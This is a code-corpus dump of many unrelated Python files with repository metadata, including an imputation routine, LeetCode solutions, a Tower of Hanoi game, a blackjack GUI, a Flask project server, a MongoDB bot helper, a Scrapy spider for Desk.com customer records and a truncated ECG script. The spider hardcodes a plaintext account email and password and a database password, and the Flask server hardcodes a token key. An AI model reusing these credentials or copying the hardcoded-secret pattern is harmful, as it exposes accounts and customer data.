os.makedirs(evaluate_dir)
p_evaluate_dir = os.path.join(evaluate_dir, 'P' + str(p) + '/')
if not os.path.exists(p_evaluate_dir):
os.makedirs(p_evaluate_dir)
# 以参数p融合内外部关键词
all_merged_kp = extract_all(all_merged_info, p)
all_merged_dir = os.path.join(p_evaluate_dir, 'all_merged.txt')
evaluate.save_all_merged_results(all_merged_kp, all_merged_dir)
k_avg_evaluate = []
for k in k_list:
print('取前 ' + str(k) + ' 个关键术语的结果:')
# 文件夹k
p_k_evaluate_dir = os.path.join(p_evaluate_dir, 'top' + str(k) + '/')
if not os.path.exists(p_k_evaluate_dir):
os.makedirs(p_k_evaluate_dir)
# 取topK个关键词:
topK_merged_kp = evaluate.get_topK_kp(all_merged_kp, k)
p_k_merged_results_dir = os.path.join(p_k_evaluate_dir, 'top' + str(k) + '_phrases.txt')
evaluate.save_results(topK_merged_kp, p_k_merged_results_dir)
# evaluate: 结果stemming后进行评估
precision_avg, recall_avg, f, precision, recall = evaluate.evaluate_stem(topK_merged_kp, all_doc_keywords,
stop_words)
precision_dir = os.path.join(p_k_evaluate_dir, 'precision_' + str(k) + '.txt')
recall_dir = os.path.join(p_k_evaluate_dir, 'recall_' + str(k) + '.txt')
evaluate.save_results(precision, precision_dir)
evaluate.save_results(recall, recall_dir)
k_avg_evaluate.append({k: [precision_avg, recall_avg, f]})
print('平均检准率: ', precision_avg)
print('平均检全率: ', recall_avg)
print('F值: ', f)
print('\n')
avg_evaluate.update({p: k_avg_evaluate})
avg_dir = os.path.join(evaluate_dir, 'evaluate_avg_doc2vec.txt')
print(avg_dir)
with open(avg_dir, mode='w', encoding='utf-8')as wp:
for i in avg_evaluate:
wp.write('p='+str(i) + ': ' + str(avg_evaluate.get(i)) + '\n')
print('评估结果存储完毕!')
end_time = time.time()
time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
print('评估总体耗时: ', str(time_used))
| [
"LauJames_work@163.com"
] | LauJames_work@163.com |
d70ef292f9b8407850d0be8b2861610269e132d6 | 0de17c84dec8448d9063ed45b36bb16c4702b499 | /impyute/imputation/cs/em.py | 184962a31d0e9efd0d5644cfc1608fde5cfa1ae2 | [] | no_license | aureole222/Auto_ML | 1732b51ec9a8b93085747dbba3ae74d5886b9c1e | 427c1e97168d5978aeeb559fe050efba499fc3e3 | refs/heads/master | 2022-12-01T04:18:14.176425 | 2020-08-14T01:31:19 | 2020-08-14T01:31:19 | 283,636,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,511 | py | import numpy as np
from impyute.ops import matrix
from impyute.ops import wrapper
@wrapper.wrappers
@wrapper.checks
def em(data, loops=50):
""" Imputes given data using expectation maximization.
E-step: Calculates the expected complete data log likelihood ratio.
M-step: Finds the parameters that maximize the log likelihood of the
complete data.
Parameters
----------
data: numpy.nd.array
Data to impute.
loops: int
Number of em iterations to run before breaking.
inplace: boolean
If True, operate on the numpy array reference
Returns
-------
numpy.nd.array
Imputed data.
"""
nan_xy = matrix.nan_indices(data)
for x_i, y_i in nan_xy:
col = data[:, int(y_i)]
mu = col[~np.isnan(col)].mean()
std = col[~np.isnan(col)].std()
col[x_i] = np.random.normal(loc=mu, scale=std)
previous, i = 1, 1
for i in range(loops):
# Expectation
mu = col[~np.isnan(col)].mean()
std = col[~np.isnan(col)].std()
# Maximization
col[x_i] = np.random.normal(loc=mu, scale=std)
# Break out of loop if likelihood doesn't change at least 10%
# and has run at least 5 times
delta = (col[x_i]-previous)/previous
if i > 5 and delta < 0.1:
data[x_i][y_i] = col[x_i]
break
data[x_i][y_i] = col[x_i]
previous = col[x_i]
return data
| [
"xiaruizhe@Xias-iMac.local"
] | xiaruizhe@Xias-iMac.local |
56984e71ca46bff6d41242ea2239873e9f30a22c | 3369b534949fc10edbc956de5514424e2d225438 | /KR-WordRank-master/krwordrank/graph/__init__.py | 492ec1a6696ef383c6e6cc27211dc7dbb3b970bc | [] | no_license | huo223gg/mynote | d7db940d70163cadb84f9eca3652e1fab0c8bf96 | 7d6800ad582951e6f0cac9f42b1fa58e378c8823 | refs/heads/master | 2020-05-20T18:26:28.466468 | 2019-05-09T02:09:46 | 2019-05-09T02:09:46 | 185,706,744 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | from ._rank import hits | [
"44153293+huo223gg@users.noreply.github.com"
] | 44153293+huo223gg@users.noreply.github.com |
69cc105ffb1b88b37b4962ce32f29a3d2366625d | 1af1f89eb9a178b95d1ba023b209b7538fb151f0 | /Algorithms/498. Diagonal Traverse.py | a78694dcbb277726c2c4bc88dabf90747eadcb45 | [] | no_license | 0xtinyuk/LeetCode | 77d690161cc52738e63a4c4b6595a6012fa5c21e | 08bc96a0fc2b672282cda348c833c02218c356f1 | refs/heads/master | 2023-02-21T16:58:39.881908 | 2021-01-25T08:00:13 | 2021-01-25T08:00:13 | 292,037,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 712 | py | class Solution:
def findDiagonalOrder(self, matrix: List[List[int]]) -> List[int]:
sx = 0
sy = 0
m = len(matrix)
if m==0:
return []
n = len(matrix[0])
if n==0:
return []
ans = []
reverse = False
while sx<m and sy<n:
x=sx
y=sy
temp = []
while x>=0 and y<n:
temp.append(matrix[x][y])
x-=1
y+=1
if reverse:
temp.reverse()
reverse = not reverse
ans = ans + temp
if (sx==m-1):
sy+=1
else:
sx+=1
return ans | [
"xliu301@uottawa.ca"
] | xliu301@uottawa.ca |
70730442f0974d53e608141b631786d816b8d1a1 | a49aa485318e499950130a6f9bf2c565dc4ccdf3 | /script.py | d2a8c07172bacd443603463a3f6ce0682ebcc60e | [] | no_license | NguyenThanhDat-GitHub/Tower_Of_Hanoi | 886b1721db887533054ec00fbf15b43530f14895 | eda64ac99b1f1e86677c533b81bd5c47d14f5715 | refs/heads/master | 2022-12-28T23:35:10.687522 | 2020-10-14T04:07:50 | 2020-10-14T04:07:50 | 303,898,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | from stack import Stack
print("\nLet's play Towers of Hanoi!!")
#Create the Stacks
stacks = []
left_stack = Stack("Left")
middle_stack = Stack("Middle")
right_stack = Stack("Right")
stacks.append(left_stack)
stacks.append(middle_stack)
stacks.append(right_stack)
#Set up the Game
num_disks = int(input("\nHow many disks do you want to play with?\n"))
while num_disks < 3:
num_disks = int(input("Enter a number greater than or equal to 3\n"))
for i in range(num_disks, 0, -1):
left_stack.push(i)
num_optimal_moves = 2 ** num_disks - 1
print("\nThe fastest you can solve this game is in {0} moves".format(num_optimal_moves))
#Get User Input
def get_input():
choices = [stack.get_name()[0] for stack in stacks]
while True:
for i in range(len(stacks)):
name = stacks[i].get_name()
letter = choices[i]
print("Enter {0} for {1}".format(letter, name))
user_input = input("")
if user_input in choices:
for i in range(len(stacks)):
if user_input == choices[i]:
return stacks[i]
#Play the Game
num_user_moves = 0
while right_stack.get_size() != num_disks:
print("\n\n\n...Current Stacks...")
for stack in stacks:
stack.print_items()
while True:
print("\nWhich stack do you want to move from?\n")
from_stack = get_input()
print("\nWhich stack do you want to move to?\n")
to_stack = get_input()
if from_stack.is_empty():
print("\n\nInvalid Move.Try Again")
elif to_stack.is_empty() or from_stack.peek() < to_stack.peek():
disk = from_stack.pop()
to_stack.push(disk)
num_user_moves += 1
break
else:
print("\n\nInvalid Move. Try Again")
print("\n\nYou completed the game in {0} moves, and the optimal number of moves is {1}".format(num_user_moves, num_optimal_moves))
| [
"noreply@github.com"
] | noreply@github.com |
6c1d1eae9b949ccb140ce5643a6b76cfb45e170b | 9beaf19f08859a3706602bb014128e0df83c9223 | /dic_ex4 | 68febee4833f70cbaacfc422313e0bc668c14386 | [] | no_license | 1912souravi/Python | ba8b63f988f658578d327a8ea0421bbc98245edf | cdf3606a321f562bcde41850f08a15e76bf28079 | refs/heads/master | 2021-01-20T23:47:34.365081 | 2017-10-10T01:18:11 | 2017-10-10T01:18:11 | 101,852,403 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 570 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 4 08:13:01 2017
@author: souravi
"""
lst=[]
dic_day={}
max_v=0
max_k=0
file=open("/Users/souravi/Documents/Python/romeo.txt")
'''1'''
for line in file:
line=line.rstrip()
lst=line.split()
if lst[0]=='From':
dom=lst[5].split(':')
if dom[0] in dic_day:
dic_day[dom[0]]+=1
else:
dic_day[dom[0]]=1
lst=[]
for k,v in dic_day.items():
lst.append((k,v))
lst=sorted(lst)
for i in lst:
print(i[0],i[1])
| [
"noreply@github.com"
] | noreply@github.com | |
17f3f3381b7ad68625cfcd987954b1e8ea98b8f8 | d16ae20e90bfabb6aeef16fd5b19d71fcc45e29f | /confess/forms.py | 432edcb5affdbc904f2f5aa6621a339fcbe1d0fb | [
"MIT"
] | permissive | amartinez1/confessions | 49012af3f7fd8862c592b54c0b5d5a9a5ec4861d | 8c66700525d47e3657ffbcc0aacb11d238519126 | refs/heads/master | 2021-01-02T09:19:11.074743 | 2014-06-16T14:38:25 | 2014-06-16T14:38:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | from .models import Post
from django import forms
from django.forms import ModelForm
class ConfessForm(ModelForm):
class Meta:
model = Post
fields = ['title','text']
| [
"ncorecarbon@gmail.com"
] | ncorecarbon@gmail.com |
0f000b6128b9efe08f58ca0df022b6cff521951f | ec002f4e1a9d98e2fff2b8d6af0eaaf15fb044ee | /Web/CrawlMasPic/Bing/revoke.py | 2689c52bff43756c661b871adc6003b1c13502b9 | [] | no_license | SeaEagleI/Python | 40fb5c3edf0016f730f4938c03ac9eb29591797b | eda3fd7b590816851894795efd23a58f2cd49dfb | refs/heads/master | 2021-07-15T07:28:33.790788 | 2020-05-17T08:48:49 | 2020-05-17T08:48:49 | 148,288,877 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | # -*- coding: utf-8 -*-
from config import *
from tqdm import tqdm
cp_lines = [line.split('\t')[-1]+'.jpg' for line in LoadTxtToLines(cp_path) if 'Failed' not in line]
| [
"38852917+SeaEagleI@users.noreply.github.com"
] | 38852917+SeaEagleI@users.noreply.github.com |
71895a10c1b2c7e904d98028e8c8589a2d8b0dc4 | 66ce62faf87aa9f5e6446c6ea0827fec580385ce | /ABCapp/apps.py | 2b9b65b9b2758de921a8bd3510af8c722bf32b2c | [] | no_license | gunjan-prog/project | 1fb0c763223325283d75acaca1c1ac49b1f41b83 | 9b8c74ed0dc9ed18ee5e89ead030db97f520eefc | refs/heads/master | 2022-08-15T12:37:44.411830 | 2020-05-18T08:01:11 | 2020-05-18T08:01:11 | 264,861,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from django.apps import AppConfig
class AbcappConfig(AppConfig):
name = 'ABCapp'
| [
"noreply@github.com"
] | noreply@github.com |
a1d117f90824e00c627b17fadd9f17e197db1136 | d348b7062212459b7c3b22c6e1ef0976b3c791f2 | /db.py | 0415fb08710484dee9cccd115d3f7d4f9c725ec1 | [] | no_license | dmitriipolushin/deliverInnoBot | 54d6936880c069fd5f49510e8d656ca18cb3a2a8 | 4ad9a0d35ad17bc0fd96fcf62fbec4e2e3af59a5 | refs/heads/master | 2023-02-15T07:35:36.251169 | 2020-11-11T19:14:11 | 2020-11-11T19:14:11 | 307,364,407 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,846 | py | from pymongo import MongoClient
connection = MongoClient()
db = connection.users_information
def new_user(chat_id, alias):
"""Function to add new user to database
Args:
chat_id (string): id of new user in telegram
alias (string): alias of new user
"""
user_info = {'_id': chat_id,
'next_published_offer_id': 0,
'next_taken_offer_id': 0,
'alias': alias,
'published_offers': {},
'taken_offers': {},
'profile': { 'your_offers': 0,
'complete_offers': 0
},
}
user_id = db.users.insert_one(user_info).inserted_id
def user_exists(chat_id):
"""Check that field of user exists in database
Args:
chat_id (string): id of user in telegram
"""
return db.users.find_one({'_id':chat_id}) != None
def add_dungling_offer(chat_id, shop, item, bounty):
user = db.users.find_one({'_id': chat_id})
user['dungling_offer'] = {'shop': shop, 'item': item, 'bounty': bounty}
db.users.save(user)
def approve_offer(chat_id):
"""Move offer from dungling to list of all offers if user will approve it.
Args:
chat_id (string): id of user in Telegram
"""
user = db.users.find_one({'_id': chat_id})
# dungling offer
dung_offer = user['dungling_offer']
adding_index = user['next_published_offer_id']
user['published_offers'][str(adding_index)] = dung_offer
# update the id for next offer
user['next_published_offer_id'] += 1
db.users.save(user)
def list_published_offers(chat_id):
"""Function that return list of dicts of user published offers
Args:
chat_id (int): id of user
Returns:
list: list of user's published offers
"""
user = db.users.find_one({'_id': chat_id})
return user['published_offers']
def list_taken_offers(chat_id):
"""Function that return list of dicts of user taken offers from DB
Args:
chat_id (int): id of user
Returns:
list: list of user's published offers
"""
user = db.users.find_one({'_id': chat_id})
return user['taken_offers']
def list_all_offers(chat_id):
"""Function that returns information about users except the one who send a request
Args:
chat_id (int): id of user in telegram and DB that send request
Returns:
dict: information about all users
"""
all_users = db.users.find({'_id': {'$nin': [chat_id]}})
return all_users
def delete_published_offer(chat_id, offer_id):
"""Function to delete published offer from user db document
Args:
chat_id (int): id of user in telegram and in DB
offer_id (string): id of offer that we need to delete
"""
user = db.users.find_one({'_id': chat_id})
print('offer deleted')
print(user['published_offers'][offer_id])
del user['published_offers'][offer_id]
db.users.save(user)
def delete_taken_offer(chat_id, offer_id):
"""Function to delete taken offer from user db document
Args:
chat_id (int): id of user in telegram and in DB
offer_id (string): id of offer that we need to delete
"""
user = db.users.find_one({'_id': chat_id})
print('offer deleted')
print(user['taken_offers'][offer_id])
del user['taken_offers'][offer_id]
db.users.save(user)
def take_offer(chat_id, user_id, number):
"""Function to accepting offer of one user by another
Args:
chat_id (int): id of user that take offer
user_id (int): id of user that published offer
number (string): number of offer in published offer list of reciever in DB
"""
taker = db.users.find_one({'_id': chat_id})
reciever = db.users.find_one({'_id': user_id})
taken_offers_adding_index = taker['next_taken_offer_id']
offer = reciever['published_offers'][number]
offer['alias'] = taker['alias']
# different offer variable because we need to write
# different aliases fot taker and reciever
taken_offer = offer
taken_offer['alias'] = reciever['alias']
taker['taken_offers'][str(taken_offers_adding_index)] = taken_offer
taker['next_taken_offer_id'] += 1
taker_alias = taker['alias']
reciever['published_offers'][number]['taker_alias'] = taker_alias
reciever['taken_offers']['taken'+number] = reciever['published_offers'][number]
del reciever['published_offers'][number]
db.users.save(taker)
db.users.save(reciever)
def get_alias(chat_id):
"""Returns alias of user by its id in DB
Args:
chat_id (int): id of user alias of which we want
Returns:
string: alias of user from DB
"""
return db.users.find_one({'_id': chat_id})['alias'] | [
"dmitriipolushin@pop-os.localdomain"
] | dmitriipolushin@pop-os.localdomain |
5d339191de8e177da4fd0c015a83e2fab14cadf4 | 2a32d7e35ce7e8e8e669fe69ec81cca28ebed176 | /blackjack.py | 48740e1501fae015d517323bc6976cfa1c5c3578 | [] | no_license | ntrut/Blackjack | 311efa472ab7a570bf3ed78945d869894ca44381 | db10784099bb0fcd6802abfbb14474646edec2d7 | refs/heads/main | 2023-08-22T16:28:08.489762 | 2021-10-22T13:23:43 | 2021-10-22T13:23:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,819 | py | import random
import tkinter
from PIL.Image import Image
mainWindow = tkinter.Tk()
def load_images(card_images):
suits = ['H', 'C', 'D', 'S']
face_cards = ['J', 'Q', 'K', 'A']
for suit in suits:
for card in range(2, 11):
name = 'PNG/{}{}.png'.format(str(card), suit)
image = tkinter.PhotoImage(file=name)
image = image.subsample(8, 8)
card_images.append((card, image))
# face cards
for card in face_cards:
name = 'PNG/{}{}.png'.format(str(card), suit)
image = tkinter.PhotoImage(file=name)
image = tkinter.PhotoImage(file=name)
image = image.subsample(8, 8)
if str(card) == 'A':
card_images.append((1, image))
else:
card_images.append((10, image))
def deal_card(frame):
next_card = deck.pop(0)
tkinter.Label(frame, image=next_card[1], relief='raised').pack(side="left")
return next_card
def score_hand(hand):
# Calculate the total score of all cards in the list.
# Only one ace can have the value 11, and this will be reduce to 1 if the hand would bust.
score = 0
ace = False
for next_card in hand:
card_value = next_card[0]
if card_value == 1 and not ace:
ace = True
card_value = 11
score += card_value
# if we would bust, check if there is an ace and subtract 10
if score > 21 and ace:
score -= 10
ace = False
return score
def deal_dealer():
dealer_score = score_hand(dealer_hand)
while 0 < dealer_score < 17:
dealer_hand.append(deal_card(dealer_card_frame))
dealer_score = score_hand(dealer_hand)
dealer_score_label.set(dealer_score)
player_score = score_hand(player_hand)
if player_score > 21:
result_text.set("Dealer wins!")
elif dealer_score > 21 or dealer_score < player_score:
result_text.set("Player wins!")
elif dealer_score > player_score:
result_text.set("Dealer wins!")
else:
result_text.set("Draw!")
def deal_player():
player_hand.append(deal_card(player_card_frame))
player_score = score_hand(player_hand)
player_score_label.set(player_score)
if player_score > 21:
result_text.set("Dealer Wins")
# deal_player global player_score
# global player_ace
# card_value = deal_card(player_card_frame)[0]
# if card_value == 1 and not player_ace:
# player_ace = True
# card_value = 11
# player_score += card_value
#
# if player_score > 21 and player_ace:
# player_score -= 10
# player_ace = False
# player_score_label.set(player_score)
# if player_score > 21:
# result_text.set("Dealer Wins")
mainWindow.title("Black Jack")
mainWindow.geometry("640x480")
mainWindow.configure(background="green")
result_text = tkinter.StringVar()
result = tkinter.Label(mainWindow, textvariable=result_text)
result.grid(row=0, column=0, columnspan=3)
card_frame = tkinter.Frame(mainWindow, relief="sunken", borderwidth=1, background="green")
card_frame.grid(row=1, column=0, sticky='ew', columnspan=3, rowspan=2)
dealer_score_label = tkinter.IntVar()
tkinter.Label(card_frame, text="Dealer", background="green", fg='white').grid(row=0, column=0)
tkinter.Label(card_frame, textvariable=dealer_score_label, background="green", fg="white").grid(row=1, column=0)
# embedded frame to hold the card images
dealer_card_frame = tkinter.Frame(card_frame, background="green")
dealer_card_frame.grid(row=0, column=1, sticky="ew", rowspan=2)
player_score_label = tkinter.IntVar()
tkinter.Label(card_frame, text="Player", background="green", fg="white").grid(row=2, column=0)
tkinter.Label(card_frame, textvariable=player_score_label, background="green", fg="white").grid(row=3, column=0)
# embedded frame to hold the card images
player_card_frame = tkinter.Frame(card_frame, background="green")
player_card_frame.grid(row=2, column=1, sticky='ew', rowspan=2)
button_frame = tkinter.Frame(mainWindow)
button_frame.grid(row=3, column=0, columnspan=3, sticky='w')
dealer_button = tkinter.Button(button_frame, text="Dealer", command=deal_dealer)
dealer_button.grid(row=0, column=0)
player_button = tkinter.Button(button_frame, text="Player", command=deal_player)
player_button.grid(row=0, column=1)
# load cards
cards = []
load_images(cards)
# create deck and shuffle
deck = list(cards)
random.shuffle(deck)
print(deck)
dealer_hand = []
player_hand = []
deal_player()
dealer_hand.append(deal_card(dealer_card_frame))
deal_player()
mainWindow.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
c536b65e7478d8edb1d6e8355ea96b32a2dda8e6 | 7703d7dddeeefb770b75a4a411d1cb9f807d79b0 | /runserver.py | f87354bc72e630d6ae8922589f7d28aca3fe5cae | [] | no_license | Travaill/Project-Management-System-server | d67e7bdcc53c41fe345416f89c694c3515c85052 | ccb29e8abfff0a32f1197b81449df84f006e1906 | refs/heads/master | 2020-03-26T22:58:15.577936 | 2018-08-21T03:13:31 | 2018-08-21T03:13:31 | 145,500,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,472 | py | from flask import Flask
from flask import render_template
from flask import request
from flask import url_for
from flask_cors import *
from login import *
from user import *
from project import *
from manage import *
app=Flask(__name__)
key = "JLUIE487"
CORS(app, resources=r'/*')
@app.route('/login', methods=['POST']) #登录
def Login():
if request.method == 'POST':
sn=request.get_json()['sn']
password=request.get_json()['password']
info = SignIn(sn, password)
return json.dumps(info),info['status_code']
@app.route('/user', methods=['POST','PUT','GET'])
def UserOperation(): #注册
token = request.headers.get('X-USER-TOKEN')
if request.method == 'POST':
sn = request.get_json()['sn']
name=request.get_json()['name']
password = request.get_json()['password']
email = request.get_json()['email']
info = AddUser(sn,name,password,email)
return json.dumps({'info': info['info']}), info['statusCode']
else:
if certify_token(key, token):
if request.method == 'GET':
info = GetUser(token)
print (token)
print (info)
return json.dumps(info)
elif request.method == 'PUT':
email = request.get_json()['email']
name = request.get_json()['name']
info = UpdateUser(token,name,email)
return json.dumps(info)
else:
return json.dumps({'info': '请重新登录'}), 401
@app.route('/project/<int:id>', methods=['POST','GET','PUT','DELETE']) #项目相关接口
def ProjetOperation(id):
token = request.headers.get('X-USER-TOKEN')
if certify_token(key, token):
if request.method == 'GET': #获取项目列表
data = GetProject(token)
return json.dumps(data)
elif request.method == 'POST':
name = request.get_json()['name']
description = request.get_json()['description']
site_address = request.get_json()['site_address']
info = AddProject(token, name, description, site_address)
return json.dumps({'info':info['info']}),info['statusCode']
elif request.method == 'PUT':
name = request.get_json()['name']
description = request.get_json()['description']
site_address = request.get_json()['site_address']
id = request.get_json()['id']
info = UpdateProject(id, name, description, site_address)
return json.dumps({'info': info['info']}), info['statusCode']
elif request.method == 'DELETE':
info = DelProject(id)
return json.dumps({'info': info['info']}), info['statusCode']
else:
return json.dumps({'info': '请重新登录'}), 401
@app.route('/manage/project', methods=['POST','GET','PUT','DELETE'])
def Project():
token = request.headers.get('X-USER-TOKEN')
if certify_token(key, token):
if request.method == 'GET':
info = projectManage(token)
return json.dumps(info)
@app.route('/manage/user', methods=['POST','GET'])
def User():
token = request.headers.get('X-USER-TOKEN')
if certify_token(key, token):
if request.method == 'GET':
info = UserManage(token)
return json.dumps(info)
if __name__=='__main__':
app.run(debug=True) | [
"2329677945@qq.com"
] | 2329677945@qq.com |
3b522ad5c1bc3e9b2c00cb9dae382a3145c20fd4 | 7cd8ee14711eaf33cee0d9e06e78a974fc579242 | /PIFramework/juicer/spiders/desk_customer_browse.py | e02c7f424af19bcbefa4456451ba138e83a60a4e | [] | no_license | Chandler-Song/pi | c618117dfdd9a7496a57c69f029851e94787f591 | aebc6d65b79ed43c66e7e1bf16d6d9f31b470372 | refs/heads/master | 2022-03-13T02:44:30.452673 | 2019-02-19T09:38:45 | 2019-02-19T09:38:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,849 | py | from juicer.utils import *
from w3lib.http import basic_auth_header
class deskcustomerbrowse(JuicerSpider):
name = "desk_customer_browse"
start_urls = ('https://www.desk.com/',)
def __init__(self, *args, **kwargs):
super(deskcustomerbrowse, self).__init__(*args, **kwargs)
self.auth = basic_auth_header('chetan.m@positiveintegers.com', 'Welcome@123')
self.main_url = 'https://sathyamcinemas.desk.com'
self.headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'Authorization': self.auth
}
self.conn = MySQLdb.connect(user="root", host = "localhost", db="DESKCASES", passwd='root', use_unicode=True)
self.cur = self.conn.cursor()
self.conn.set_character_set('utf8')
self.cur.execute('SET NAMES utf8;')
self.cur.execute('SET CHARACTER SET utf8;')
self.cur.execute('SET character_set_connection=utf8;')
get_query_param = "select case_customer_url from desk_cases where case_customer_url not in (select customer_link from desk_customer) order by rand() limit 50000"
self.cur.execute(get_query_param)
self.profiles_list = [i for i in self.cur.fetchall()]
self.customer_insert = "INSERT INTO desk_customer(customer_link, customer_id, customer_company_link, customer_twitter_user, customer_access_company_cases, customer_access_private_portal, customer_addresses, customer_avatar, customer_background, customer_company, customer_company_name, customer_created_at, customer_custom_fields, customer_display_name, customer_emails, customer_external_id, customer_first_name, customer_label_ids, customer_language, customer_last_name, customer_locked_until, customer_phone_numbers, customer_title, customer_uid, customer_updated_at, created_at, modified_at, last_seen ) values(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, now(), now(), now()) on duplicate key update modified_at = now(), customer_link=%s, customer_id=%s, customer_company_link=%s, customer_twitter_user=%s, customer_access_company_cases=%s, customer_access_private_portal=%s, customer_addresses=%s, customer_avatar=%s, customer_background=%s, customer_company=%s, customer_company_name=%s, customer_created_at=%s, customer_custom_fields=%s, customer_display_name=%s, customer_emails=%s, customer_external_id=%s, customer_first_name=%s, customer_label_ids=%s, customer_language=%s, customer_last_name=%s, customer_locked_until=%s, customer_phone_numbers=%s, customer_title=%s, customer_uid=%s, customer_updated_at=%s"
def __del__(self):
self.conn.close()
self.cur.close()
def parse(self, response):
sel = Selector(response)
if self.profiles_list:
for cus in self.profiles_list:
yield Request(cus[0], callback=self.parse_customer, headers = self.headers, meta = {"customer_link": cus[0]})
def parse_customer(self, response):
customer_links = response.meta.get('customer_link', '')
output = response.body
output = json.loads(output.strip('\n'))
total_entries = output.get('_embedded', {}).get('entries', [])
if not total_entries:
if isinstance(output, dict):
toal_en = []
toal_en.append(output)
total_entries = toal_en
for ttl_en in total_entries:
company_links = ttl_en.get('_links', {}).get('company', {})
if company_links:
company_links = company_links.get('href', '')
twitter_user = ttl_en.get('_links', {}).get('twitter_user', {})
if twitter_user:
twitter_user = twitter_user.get('href', '')
if company_links:
company_links = "%s%s" %(self.main_url, company_links)
if twitter_user:
twitter_user = "%s%s" %(self.main_url, twitter_user)
access_company_cases = ttl_en.get('access_company_cases', '')
access_private_portal = ttl_en.get('access_private_portal', '')
addresses = '<>'.join(ttl_en.get('addresses', []))
avatar = ttl_en.get('avatar', '')
background = ttl_en.get('background', '')
company = ttl_en.get('company', '')
company_name = ttl_en.get('company_name', '')
created_at = ttl_en.get('created_at', '')
custom_fields = ttl_en.get('custom_fields', {})
if not custom_fields:
custom_fields = ''
else:
custom_fields = json.dumps(custom_fields)
display_name = ttl_en.get('display_name', '')
emails = ttl_en.get('emails', [])
if emails:
emails = '<>'.join(["%s%s%s" % (te.get('type'), ':-', te.get('value')) for te in emails])
else:
emails = ''
external_id = ttl_en.get('external_id', '')
first_name = ttl_en.get('first_name', '')
id_ = str(ttl_en.get('id', ''))
label_ids = '<>'.join([str(ld) for ld in ttl_en.get('label_ids', [])])
language = ttl_en.get('language', '')
last_name = ttl_en.get('last_name', '')
locked_until = ttl_en.get('locked_until', '')
try:
phone_numbers_dict = ttl_en.get('phone_numbers', [])
phone_numbers = phone_numbers_dict[0]['value']
except:
phone_numbers = ''
title = ttl_en.get('title', '')
uid = ttl_en.get('uid', '')
updated_at = ttl_en.get('updated_at', '')
values = (customer_links, id_, company_links, twitter_user, access_company_cases, access_private_portal, addresses, avatar, background, company, company_name, created_at, custom_fields, display_name, emails, external_id, first_name, label_ids, language, last_name, locked_until, phone_numbers, title, uid, updated_at, customer_links, id_, company_links, twitter_user, access_company_cases, access_private_portal, addresses, avatar, background, company, company_name, created_at, custom_fields, display_name, emails, external_id, first_name, label_ids, language, last_name, locked_until, phone_numbers, title, uid, updated_at)
self.cur.execute(self.customer_insert, values)
| [
"aravind@headrun.com"
] | aravind@headrun.com |
df6d16af59ecc459d304d7406ac8442ed9b48f06 | 26771494974942f4ab18d2cd8247506c344e1d14 | /117-populatingNextRightPointersinEachNodeII.py | 9b9e705cd655c6bfec49ca57ca65aa58890158d4 | [] | no_license | wangyunpengbio/LeetCode | 9f4c6076e067c5e847d662679483f737d40e8ca5 | cec1fd11fe43177abb2d4236782c0f116e6e8bce | refs/heads/master | 2020-04-29T22:28:25.899420 | 2020-04-03T07:37:26 | 2020-04-03T07:37:26 | 176,448,957 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,312 | py | """
# Definition for a Node.
class Node:
def __init__(self, val, left, right, next):
self.val = val
self.left = left
self.right = right
self.next = next
"""
class Solution:
def connect(self, root: 'Node') -> 'Node':
if root == None:
return None
queue = [(1,root)]
lastLevel = 1
fillLevelQueue = []
while len(queue) != 0:
level,item = queue.pop(0)
if level == lastLevel + 1: # 临时的列表存完一层,就进行结点连接吗,然后再清空该列表
nodeNum = len(fillLevelQueue)
fillLevelQueue.append(None)
for i in range(nodeNum):
fillLevelQueue[i].next = fillLevelQueue[i+1]
# print("line"+str(i))
lastLevel = lastLevel + 1
fillLevelQueue = []
if item == None: # 如果层中间遍历到空结点,就不追加,层最后遍历到空结点也不追加
continue
fillLevelQueue.append(item) # 每次遍历到结点的时候,顺便把结点存到另一个列表中
# print(item.val)
queue.append((level + 1,item.left))
queue.append((level + 1,item.right))
return root
| [
"wangyunpeng_bio@qq.com"
] | wangyunpeng_bio@qq.com |
cb836705f68c0926ca5a50e930949c6f02ab4f2e | 1b3d2752ced80ab6dee1ef314d2f66cd39160117 | /zero-cross.py | 2562e37424e81ee74ede0c69b3b2018e53fc10d0 | [] | no_license | MaxPilgrim/r_peak_detection | 2c93e024d3662c31419f6e33a7c3fb7a953129de | f064ffa4f0f087321e5453f304e58e6d5f6cfa6d | refs/heads/master | 2016-08-07T14:40:47.895533 | 2015-06-10T20:50:10 | 2015-06-10T20:50:10 | 37,219,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,194 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import shutil
import os
import codecs
import sys
import math
import matplotlib.pyplot as plt
DATA_PATH = 'data/data_1.in'
FILTER_PATH = 'filter/FIR_kernel_27.in'
n = 6000
lambda_k = 0.99
c_k = 4
lambda_D = 0.99
lambda_Th = 0.99
filterDelay = 14
filterN = 27
def sign(x):
if (x < 0):
return -1
else:
return 1
def readECG():
lines = open(DATA_PATH,'r').readlines()
ecg = map(lambda x: float(x) , lines) #* 255
baseline = 0
c = 0
for e in ecg:
if e != -10000000 :
baseline += e
c += 1
baseline /= c
ecg = map(lambda x: x if x != -10000000 else baseline, ecg)
'''
a = min(ecg)
b = max(ecg)
d = 127.0
c = -127.0
ecg = map(lambda x: (x - a) / (b - a) * (d - c) + c, ecg)
f = open('data.out','w')
for e in ecg:
